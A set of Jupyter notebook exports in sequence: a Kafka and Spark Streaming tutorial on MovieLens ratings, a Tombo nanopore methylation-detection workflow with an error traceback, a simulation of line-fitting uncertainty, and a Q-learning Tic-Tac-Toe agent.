afka_2.13-2.7.0/bin/../libs/jackson-module-jaxb-annotations-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-paranamer-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jackson-module-scala_2.13-2.10.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.activation-api-1.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.annotation-api-1.3.5.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.inject-2.6.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.validation-api-2.0.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.ws.rs-api-2.1.6.jar:/content/kafka_2.13-2.7.0/bin/../libs/jakarta.xml.bind-api-2.3.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.25.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javassist-3.26.0-GA.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.servlet-api-3.1.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/javax.ws.rs-api-2.1.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/jaxb-api-2.3.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-client-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-common-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-container-servlet-core-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-hk2-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-media-jaxb-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jersey-server-2.31.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-client-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-continuation-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-http-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-io-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-security-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-server-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlet-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-servlets-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jetty-util-9.4.33.v20201020.jar:/content/kafka_2.13-2.7.0/bin/../libs/jopt-simple-5.0.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka_2.13-2.7.0-sources.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-clients-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-log4j-appender-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-raft-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-examples-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-scala_2.13-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-streams-test-utils-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/kafka-tools-2.7.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/log4j-1.2.17.jar:/content/kafka_2.13-2.7.0/bin/../libs/lz4-java-1.7.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/maven-artifact-3.6.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/metrics-core-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-buffer-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-codec-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-handler-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-resolver-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-epoll-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/netty-transport-native-unix-common-4.1.51.Final.jar:/content/kafka_2.13-2.7.0/bin/../libs/osgi-resource-locator-1.0.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/paranamer-2.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/plexus-utils-3.2.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/reflections-0.9.12.jar:/content/kafka_2.13-2.7.0/bin/../libs/rocksdbjni-5.18.4.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-collection-compat_2.13-2.2.0.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-java8-compat_2.13-0.9.1.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-library-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-logging_2.13-3.9.2.jar:/content/kafka_2.13-2.7.0/bin/../libs/scala-reflect-2.13.3.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-api-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/slf4j-log4j12-1.7.30.jar:/content/kafka_2.13-2.7.0/bin/../libs/snappy-java-1.1.7.7.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zookeeper-jute-3.5.8.jar:/content/kafka_2.13-2.7.0/bin/../libs/zstd-jni-1.4.5-6.jar kafka.Kafka ./kafka_2.13-2.7.0/config/server.properties
root 1329 359 0 04:18 ? 00:00:00 /bin/bash -c ps -ef | grep kafka
root 1331 1329 0 04:18 ? 00:00:00 grep kafka
###Markdown
Create the kafka topics with the following specs:- susy-train: partitions=1, replication-factor=1 - susy-test: partitions=2, replication-factor=1
###Code
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 1 --topic reco-train
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --create --bootstrap-server 127.0.0.1:9092 --replication-factor 1 --partitions 2 --topic reco-test
###Output
Created topic reco-train.
Created topic reco-test.
###Markdown
Describe the topic for details on the configuration
###Code
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-train
!./kafka_2.13-2.7.0/bin/kafka-topics.sh --describe --bootstrap-server 127.0.0.1:9092 --topic reco-test
###Output
Topic: reco-train PartitionCount: 1 ReplicationFactor: 1 Configs: segment.bytes=1073741824
Topic: reco-train Partition: 0 Leader: 0 Replicas: 0 Isr: 0
Topic: reco-test PartitionCount: 2 ReplicationFactor: 1 Configs: segment.bytes=1073741824
Topic: reco-test Partition: 0 Leader: 0 Replicas: 0 Isr: 0
Topic: reco-test Partition: 1 Leader: 0 Replicas: 0 Isr: 0
###Markdown
The replication factor 1 indicates that the data is not being replicated. This is due to the presence of a single broker in our kafka setup.In production systems, the number of bootstrap servers can be in the range of 100's of nodes. That is where the fault-tolerance using replication comes into picture.Please refer to the [docs](https://kafka.apache.org/documentation/replication) for more details. Movielens DatasetKafka being an event streaming platform, enables data from various sources to be written into it. For instance:- Web traffic logs- Astronomical measurements- IoT sensor data- Product reviews and many more.For the purpose of this tutorial, lets download the [Movielens](https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true) dataset and feed the data into kafka manually.
###Code
!wget -O ml_ratings.csv https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true
###Output
--2021-06-25 04:18:18-- https://github.com/sparsh-ai/reco-data/blob/master/MovieLens_100K_ratings.csv?raw=true
Resolving github.com (github.com)... 192.30.255.112
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv [following]
--2021-06-25 04:18:19-- https://github.com/sparsh-ai/reco-data/raw/master/MovieLens_100K_ratings.csv
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv [following]
--2021-06-25 04:18:19-- https://raw.githubusercontent.com/sparsh-ai/reco-data/master/MovieLens_100K_ratings.csv
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2179205 (2.1M) [text/plain]
Saving to: ‘ml_ratings.csv’
ml_ratings.csv 100%[===================>] 2.08M --.-KB/s in 0.1s
2021-06-25 04:18:20 (20.4 MB/s) - ‘ml_ratings.csv’ saved [2179205/2179205]
###Markdown
Explore the dataset
###Code
movielens_df = pd.read_csv('ml_ratings.csv')
movielens_df.head()
# Number of datapoints and columns
len(movielens_df), len(movielens_df.columns)
###Output
_____no_output_____
###Markdown
Split the dataset
###Code
train_df, test_df = train_test_split(movielens_df, test_size=0.4, shuffle=True)
print("Number of training samples: ",len(train_df))
print("Number of testing sample: ",len(test_df))
x_train_df = train_df.drop(["Rating"], axis=1)
y_train_df = train_df["Rating"]
x_test_df = test_df.drop(["Rating"], axis=1)
y_test_df = test_df["Rating"]
# The labels are set as the kafka message keys so as to store data
# in multiple-partitions. Thus, enabling efficient data retrieval
# using the consumer groups.
x_train = list(filter(None, x_train_df.to_csv(index=False).split("\n")[1:]))
y_train = list(filter(None, y_train_df.to_csv(index=False).split("\n")[1:]))
x_test = list(filter(None, x_test_df.to_csv(index=False).split("\n")[1:]))
y_test = list(filter(None, y_test_df.to_csv(index=False).split("\n")[1:]))
NUM_COLUMNS = len(x_train_df.columns)
len(x_train), len(y_train), len(x_test), len(y_test)
###Output
_____no_output_____
###Markdown
Store the train and test data in kafkaStoring the data in kafka simulates an environment for continuous remote data retrieval for training and inference purposes.
###Code
def error_callback(exc):
raise Exception('Error while sendig data to kafka: {0}'.format(str(exc)))
def write_to_kafka(topic_name, items):
count=0
producer = KafkaProducer(bootstrap_servers=['127.0.0.1:9092'])
for message, key in items:
producer.send(topic_name, key=key.encode('utf-8'), value=message.encode('utf-8')).add_errback(error_callback)
count+=1
producer.flush()
print("Wrote {0} messages into topic: {1}".format(count, topic_name))
write_to_kafka("reco-train", zip(x_train, y_train))
write_to_kafka("reco-test", zip(x_test, y_test))
# ! /content/kafka_2.13-2.7.0/bin/kafka-console-consumer.sh \
# --bootstrap-server localhost:9092 \
# --topic reco-train \
# --from-beginning
###Output
Processed a total of 60000 messages
###Markdown
Spark Streaming
###Code
!apt-get install openjdk-8-jdk-headless -qq > /dev/null
!wget https://downloads.apache.org/spark/spark-2.4.8/spark-2.4.8-bin-hadoop2.7.tgz
!tar -xvf spark-2.4.8-bin-hadoop2.7.tgz
!pip install findspark
!wget "https://repo1.maven.org/maven2/org/apache/spark/spark-streaming-kafka-0-8-assembly_2.11/2.4.8/spark-streaming-kafka-0-8-assembly_2.11-2.4.8.jar"
import os
os.environ["JAVA_HOME"] = "/usr/lib/jvm/java-8-openjdk-amd64"
os.environ["SPARK_HOME"] = "/content/spark-2.4.8-bin-hadoop2.7"
os.environ['PYSPARK_SUBMIT_ARGS'] = '--jars /content/spark-streaming-kafka-0-8-assembly_2.11-2.4.8.jar pyspark-shell'
import findspark
findspark.init()
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.ml.feature import Normalizer, StandardScaler
import random
import pyspark
import sys
from pyspark import SparkContext, SparkConf
from pyspark.streaming import StreamingContext
from pyspark.streaming.kafka import KafkaUtils
from uuid import uuid1
import time
kafka_topic_name = "reco-train"
kafka_bootstrap_servers = 'localhost:9092'
###Output
_____no_output_____
###Markdown

###Code
from datetime import datetime
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
print("Current Time =", current_time)
sc = pyspark.SparkContext()
ssc = StreamingContext(sc,5)
kafka_topic_name = "reco-train"
kafka_bootstrap_servers = 'localhost:9092'
kvs = KafkaUtils.createStream(ssc, kafka_bootstrap_servers, 'spark-streaming-consumer', {kafka_topic_name:1})
kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], {"metadata.broker.list": kafka_bootstrap_servers})
kvs = KafkaUtils.createDirectStream(ssc, [kafka_topic_name], {
'bootstrap.servers':kafka_bootstrap_servers,
'group.id':'test-group',
'auto.offset.reset':'largest'})
lines = kvs.map(lambda x: x[1])
counts = lines.flatMap(lambda line: line.split(' '))
counts = lines.flatMap(lambda line: line.split(' ')).map(lambda word: (word, 1)).reduceByKey(lambda a, b: a+b)
counts.pprint()
ssc.start()
# stream will run for 50 sec
ssc.awaitTerminationOrTimeout(50)
ssc.stop()
sc.stop()
###Output
-------------------------------------------
Time: 2021-06-25 03:46:50
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:46:55
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:00
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:05
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:10
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:15
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:20
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:25
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:30
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:35
-------------------------------------------
-------------------------------------------
Time: 2021-06-25 03:47:40
-------------------------------------------
|
germinated_spores-Tombo_basepair_modification_version_1/germinated_spores_1.ipynb | ###Markdown
Tombo is a suite of tools primarily for the identification of modified nucleotides from nanopore sequencing data, it Re-annotates raw signal with genomic alignment from existing basecalls* This script will identify the modified bases in the sequencesInput* fastq files * reference genome.fasta Make sure before you run any of your samples, you define your directories
###Code
import os
FAST5IN_DIR = '../../analyses/single_fast5s/germinated_spores/rep1/'
GENOME_fn = '../../data/genomic_resources/chr_A_B_unassigned.fasta'
OUT_DIR = '../../analyses/methylation_calling/germinated_spores/'
Tombo_exc ='../../../anaconda3/bin/tombo'
##define your directories' pathway by giving them absoulte path.
FAST5IN_DIR = os.path.abspath(FAST5IN_DIR)
GENOME_fn = os.path.abspath(GENOME_fn)
OUT_DIR = os.path.abspath(OUT_DIR)
Tombo_exc = os.path.abspath(Tombo_exc)
!ls {FAST5IN_DIR}
!ls {GENOME_fn}
!{Tombo_exc} --version
Tombo_index =
###This step creates an index from raw nanopore reads and stores the raw signal alignments required to perform downstream analysis
!{Tombo_exc} resquiggle {FAST5IN_DIR} {GENOME_fn} --processes 15 --num-most-common-errors 5
###this command will detect for modification
!{Tombo_exc} detect_modifications alternative_model --fast5-basedirs {FAST5IN_DIR} \
--statistics-file-basename germinated_spores_rep1.stats \
--alternate-bases 5mC 6mA --processes 15
#plot raw signal at most significant 5mC locations
!{Tombo_exc} plot most_significant --fast5-basedirs {FAST5IN_DIR} \
--statistics-filename germinated_spores.5mC.tombo.stats \
--plot-standard-model --plot-alternate-model 5mC \
--pdf-filename germinated_spores_rep_1_most_significant_5mC_sites.pdf
###Output
[09:55:45] Loading statistics from file.
******************** ERROR ********************
Statistics file not provided or provided file does not exist.
******************** ERROR ********************
Statistics file not provided or provided file does not exist.
Traceback (most recent call last):
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2680, in __init__
self._parse_stats()
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats
'Statistics file not provided or provided file does not exist.')
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit
sys.exit()
SystemExit
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3233, in TomboStats
stats = ModelStats(stat_fn)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2684, in __init__
'tombo/scripts/convert_stats.py if this stats file ' +
tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3141, in __init__
self._parse_stats()
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 2564, in _parse_stats
'Statistics file not provided or provided file does not exist.')
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_helper.py", line 361, in error_message_and_exit
sys.exit()
SystemExit
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/jamila/anaconda3/bin/tombo", line 11, in <module>
sys.exit(main())
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/__main__.py", line 279, in main
_plot_commands.plot_main(args)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2343, in plot_main
plot_most_signif(*base_args, **kwargs)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/_plot_commands.py", line 2007, in plot_most_signif
plot_intervals = ts.TomboStats(stats_fn).get_most_signif_regions(
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3235, in TomboStats
stats = LevelStats(stat_fn)
File "/home/jamila/anaconda3/lib/python3.7/site-packages/tombo/tombo_stats.py", line 3145, in __init__
'tombo/scripts/convert_stats.py if this stats file ' +
tombo.tombo_helper.TomboError: Invalid statistics file provided. Try running tombo/scripts/convert_stats.py if this stats file was created before Tombo v1.3.1
|
examples/notebooks/Statistical_error_analysis_of_line_extraction.ipynb | ###Markdown
Statisical error analysis of line uncertainty We want to find a mean and variance for the parameters of the Hough transform for line extraction in 2 dimensions as a function of the length between two points. This will be a good starting point for comparing the relative accuracy of lines vs points.
###Code
%matplotlib inline
# Simulations
import numpy as np
import scipy
import matplotlib.pyplot as plt
from scipy.stats import norm
N = 50000
img_size = 1000 #Average side length
bins = 100
L = 500 #pixels (average length)
sigma = 5./np.sqrt(12) #5 pixel uncertainty, assumed uniform
theta = np.random.uniform(-np.pi*0.85, np.pi*0.85, N)
x1 = np.random.uniform(0, img_size, (N, 2))
dx = np.array([np.sin(-theta)*L, np.cos(-theta) * L]).transpose()
x2 = x1 + dx
ro = x1[:, 0]*np.cos(theta) + x1[:, 1] * np.sin(theta)
dtheta = np.zeros(N)
dro = np.zeros(N)
for i in range(N):
x1_measured = np.random.multivariate_normal(x1[i], sigma*np.identity(2))
x2_measured = np.random.multivariate_normal(x2[i], sigma*np.identity(2))
dx_measured = x2_measured-x1_measured
theta_measured = np.arctan2(-dx_measured[0], dx_measured[1])
ro_measured = x1_measured[0]*np.cos(theta_measured) + x1_measured[1] * np.sin(theta_measured)
ro_measured_2 = x2_measured[0]*np.cos(theta_measured) + x2_measured[1] * np.sin(theta_measured)
dtheta[i] = theta[i]-theta_measured
dro[i] = ro[i] - ro_measured
ans = np.histogram(dtheta, bins, density = True)
y_theta = ans[0]
x_theta = ans[1][:-1]
sig_theta = np.std(dtheta)
print(sig_theta)
plt.plot(x_theta,y_theta, "-b", x_theta, norm.pdf(x_theta, 0, sig_theta), "-r")
plt.xlabel("$\\Delta \\theta$")
plt.ylabel("$p(\\Delta \\theta)$")
plt.legend(["Simulation", "Approximation"])
ans = np.histogram(dro/sigma, bins, range= (-5, 5), density = True)
y_ro = ans[0]
x_ro = ans[1][:-1]
sig_ro = np.std(dro/sigma)
print(sig_ro)
def double_exp_pdf(x, var):
b = np.sqrt(var/2)
return 1/(2*b)*np.exp(-np.abs(x)/b)
plt.plot(x_ro, y_ro, "-b", x_ro, double_exp_pdf(x_ro, sig_ro**2), "-r")
plt.xlabel("$\\frac{\\Delta r}{\\sigma}$")
plt.ylabel("$p(\\Delta r)$")
plt.legend(["Simulation", "Approximation"])
###Output
1.6622574229981983
###Markdown
Want to find https://stats.stackexchange.com/questions/3215/trigonometric-operations-on-standard-deviations$$ \hat{\theta} = \tan^{-1}(\Delta Y/\Delta X) $$ $$ \theta = \theta_0 + \Delta \theta$$$$ \Delta Y = \sigma_y \zeta + \mu_y$$$$ \Delta X = \sigma_x \xi + \mu_x$$where $\zeta, \xi$ are standard normal distributions. For simplicity we will assume that $\sigma_y = \sigma_x = \sigma$, $ \mu_y = \sin(\theta_0) L $, and $ \mu_x = \cos(\theta_0) L$ where $L$ is the distance$$ P[\hat{\theta} \le \theta] = P[\tan^{-1}(\Delta Y/\Delta X) \le \theta_0 + \Delta \theta] = P[\Delta Y/\Delta X \le \tan(\Delta \theta + \theta_0)] $$Let $q = \tan(\theta) = \tan(\Delta \theta + \theta_0) $$$ = P[\sigma \zeta + \mu_y \le q (\sigma_y \zeta + \mu_y)] $$$$ = P[\frac{\sigma}{L} (\zeta - q \xi) \le q \sin(\theta_0) - \cos(\theta_0)] $$This is a difference of gaussians giving a new gaussian being smaller than a function of $\theta$ and $\theta_0$. Let $b(\theta) = q \sin(\theta_0) - \cos(\theta_0) $ and $\sigma^*(\theta) = (\frac{\sigma}{L})^2(1 + \tan(\theta)^2)$ . The expression then becomes: $$ P[\hat{\theta} \le \theta] = \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz $$ We have that $$ p(\theta) = \frac{d(P[\hat{\theta} \le \theta])}{d\theta} = \mathcal{N}\left(b(\theta); 0, \sigma^*(\theta) \right) \cdot \frac{db(\theta)}{d\theta} + \int_{-\infty}^{b(\theta)} \frac{d\left(\mathcal{N}\left(z; 0, \sigma^*(\theta) \right)\right)}{d\theta} dz$$ This simplifies to: $$ p(\theta) =\mathcal{N}\left(b(\theta); 0,\sigma^*(\theta) \right) \cdot \left(\frac{db(\theta)}{d\theta} + \frac{d((\sigma^*(\theta))^{-2})}{d\theta}\right) + \frac{1}{\sigma^*(\theta)}\frac{d\sigma^*(\theta) }{d\theta} \int_{-\infty}^{b(\theta)} \mathcal{N}\left(z; 0, \sigma^*(\theta) \right) dz$$
###Code
import sympy as sp
from sympy import symbols, exp, init_printing, latex, tan, atan, cos, sin
init_printing()
sig, theta, theta0, L = symbols("sigma theta theta_0 L")
mux = L * cos(theta0)
muy = L * sin(theta0)
Z = (muy * (sig + 1) - mux * (sig + 1) * tan(theta - theta0))**2 / (2 * (sig**2 + sig**2 + tan(theta - theta0)**2))
expr = Z.diff(theta).diff(theta).subs(theta, 0)
expr.subs(theta0, 0)
###Output
_____no_output_____ |
TicTacToe/TicTacToe_Agent.ipynb | ###Markdown
Tic-Tac-Toe AgentIn this notebook, you will learn to build an RL agent (using Q-learning) that learns to play Numerical Tic-Tac-Toe with odd numbers. The environment is playing randomly with the agent, i.e. its strategy is to put an even number randomly in an empty cell. The following is the layout of the notebook: - Defining epsilon-greedy strategy - Tracking state-action pairs for convergence - Define hyperparameters for the Q-learning algorithm - Generating episode and applying Q-update equation - Checking convergence in Q-values Importing librariesWrite the code to import Tic-Tac-Toe class from the environment file
###Code
# from <TC_Env> import <TicTacToe> - import your class from environment file
import collections
import numpy as np
import random
import pickle
import time
from matplotlib import pyplot as plt
from TCGame_Env import TicTacToe
from tqdm import tqdm
# Function to convert state array into a string to store it as keys in the dictionary
# states in Q-dictionary will be of form: x-4-5-3-8-x-x-x-x
# x | 4 | 5
# ----------
# 3 | 8 | x
# ----------
# x | x | x
def Q_state(state):
return ('-'.join(str(e) for e in state.flatten().astype(int))).replace('0','x')
# Defining a function which will return valid (all possible actions) actions corresponding to a state
# Important to avoid errors during deployment.
def valid_actions(state):
valid_Actions = []
valid_Actions = [i for i in env.action_space(state)[0]] ###### -------please call your environment as env
return valid_Actions
# Defining a function which will add new Q-values to the Q-dictionary.
def add_to_dict(state):
state1 = Q_state(state)
valid_act = valid_actions(state)
if state1 not in Q_dict.keys():
for action in valid_act:
Q_dict[state1][action]=0
###Output
_____no_output_____
###Markdown
Epsilon-greedy strategy - Write your code here(you can build your epsilon-decay function similar to the one given at the end of the notebook)
###Code
# Defining epsilon-greedy policy.
def epsilon_greedy_strategy(state, time):
epsilon = min_epsilon + np.exp(-0.000001*time) * (max_epsilon - min_epsilon)
rand = np.random.random()
if rand > epsilon:
greedy_action = max(Q_dict[Q_state(state)],key=Q_dict[Q_state(state)].get)
else:
greedy_action = random.sample(valid_actions(state),1)[0]
return greedy_action
###Output
_____no_output_____
###Markdown
Tracking the state-action pairs for checking convergence - write your code here
###Code
# Initialise Q_dictionary as 'Q_dict' and States_tracked as 'States_track' (for convergence)
Q_dict = collections.defaultdict(dict)
States_track = collections.defaultdict(dict)
# Initialise few random states to be tracked
def initialise_tracking_states():
sample_action_values = [('1-x-x-x-x-4-x-x-x',(7,5)),
('x-2-x-x-x-x-5-x-x',(5,7)),
('x-8-x-7-x-x-x-x-x',(8,1)),
('x-x-x-1-6-x-x-x-x',(5,3)),
('7-4-x-x-x-6-3-x-x',(3,5)),
('x-9-5-x-x-x-8-4-x',(0,3)),
('2-7-x-x-6-x-x-3-x',(8,7)),
('x-8-x-x-x-x-x-9-x',(8,1)),
('x-6-x-x-x-x-x-x-1',(0,9)),
('1-2-x-x-x-6-7-x-x',(4,9)),
('5-7-x-X-x-x-2-6-x',(2,3)),
('7-x-6-x-x-4-9-x-x',(8,5)),
('x-8-5-x-4-x-x-1-x',(6,9)),
('9-x-3-x-4-x-x-x-8',(1,1))]
for q_value in sample_action_values:
state = q_value[0]
action = q_value[1]
States_track[state][action] = []
def preview_game(current_status):
val = current_status.split('-')
print("\n "+str(val[0])+" | "+str(val[1])+" | "+str(val[2])+" ")
print('-----------')
print(" "+str(val[3])+" | "+str(val[4])+" | "+str(val[5])+" ")
print('-----------')
print(" "+str(val[6])+" | "+str(val[7])+" | "+str(val[8])+" \n")
preview_game('9-x-3-x-4-x-x-x-8')
#Defining a function to save the Q-dictionary as a pickle file
def save_obj(obj, name ):
with open(name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def save_tracking_states():
for state in States_track.keys():
for action in States_track[state].keys():
if state in Q_dict and action in Q_dict[state]:
States_track[state][action].append(Q_dict[state][action])
initialise_tracking_states()
States_track
###Output
_____no_output_____
###Markdown
Define hyperparameters ---write your code here
###Code
# total no. of episodes
EPISODES = 5000000
# learning rate
LR = 0.20
# discount factor
GAMMA = 0.8
# no. of episodes after which states_tracked will be saved
threshold = 2500
# no.of epishods after which preive the status of games played
checkpoint_print_episodes = 500000
# Min_Greed: 0.1%
min_epsilon = 0.001
# Greed: 100%
max_epsilon = 1.0
###Output
_____no_output_____
###Markdown
Q-update loop ---write your code here
###Code
start_time = time.time()
q_track={}
q_track['1-x-x-x-x-4-x-x-x']=[]
q_track['x-2-x-x-x-x-5-x-x']=[]
q_track['x-8-x-7-x-x-x-x-x']=[]
q_track['x-x-x-1-6-x-x-x-x']=[]
q_track['7-4-x-x-x-6-3-x-x']=[]
q_track['x-9-5-x-x-x-8-4-x']=[]
q_track['2-7-x-x-6-x-x-3-x']=[]
q_track['x-8-x-x-x-x-x-9-x']=[]
q_track['x-6-x-x-x-x-x-x-1']=[]
q_track['1-2-x-x-x-6-7-x-x']=[]
q_track['5-7-x-X-x-x-2-6-x']=[]
q_track['7-x-6-x-x-4-9-x-x']=[]
q_track['x-8-5-x-4-x-x-1-x']=[]
q_track['9-x-3-x-4-x-x-x-8']=[]
agent_won_count = 0
env_won_count = 0
tie_count = 0
for episode in tqdm(range(EPISODES)):
##### Start writing your code from the next line
env = TicTacToe()
current_state = env.state
## Initalizing parameter for the episodes
reward=0
total_reward = 0
is_terminal = False
# adding the current state to dictionary
add_to_dict(current_state)
while not is_terminal:
current_lookup = Q_state(current_state)
# applying epislon-greedy policy method
current_action = epsilon_greedy_strategy(current_state, episode)
if Q_state(current_state) in q_track.keys():
q_track[Q_state(current_state)].append(current_action)
next_state,reward,is_terminal, msg = env.step(current_state,current_action)
next_lookup = Q_state(next_state)
if is_terminal:
q_value_max = 0
# Tracking the count of games won by agent and environment
if msg == "Agent Won!":
agent_won_count += 1
elif msg == "Environment Won!":
env_won_count += 1
else:
tie_count += 1
else:
add_to_dict(next_state)
max_next = max(Q_dict[next_lookup],key=Q_dict[next_lookup].get)
q_value_max = Q_dict[next_lookup][max_next]
Q_dict[current_lookup][current_action] += LR * ((reward + (GAMMA * (q_value_max))) - Q_dict[current_lookup][current_action])
current_state = next_state
total_reward += reward
if (episode + 1) % checkpoint_print_episodes == 0:
print("After playing %d games, Agent Won : %.4f, Environment Won : %.4f, Tie : %.4f"% (episode + 1,
agent_won_count / (episode + 1), env_won_count /(episode + 1), tie_count / (episode + 1)))
if ((episode + 1) % threshold) == 0:
save_tracking_states()
if ((episode + 1) % 1000000) == 0:
print('Processed %dM episodes'%((episode+1)/1000000))
elapsed_time = time.time() - start_time
save_obj(States_track,'States_tracked')
save_obj(Q_dict,'Policy')
print('Total Execution time: ', elapsed_time)
###Output
10%|█ | 500208/5000000 [06:31<57:39, 1300.63it/s]
###Markdown
Check the Q-dictionary
###Code
len(Q_dict)
# try checking for one of the states - that which action your agent thinks is the best -----This will not be evaluated
Q_dict['x-2-x-x-x-x-5-x-x']
###Output
_____no_output_____
###Markdown
Check the states tracked for Q-values convergence(non-evaluative)
###Code
# Write the code for plotting the graphs for state-action pairs tracked
plt.figure(0, figsize=(16,7))
plt.subplot(241)
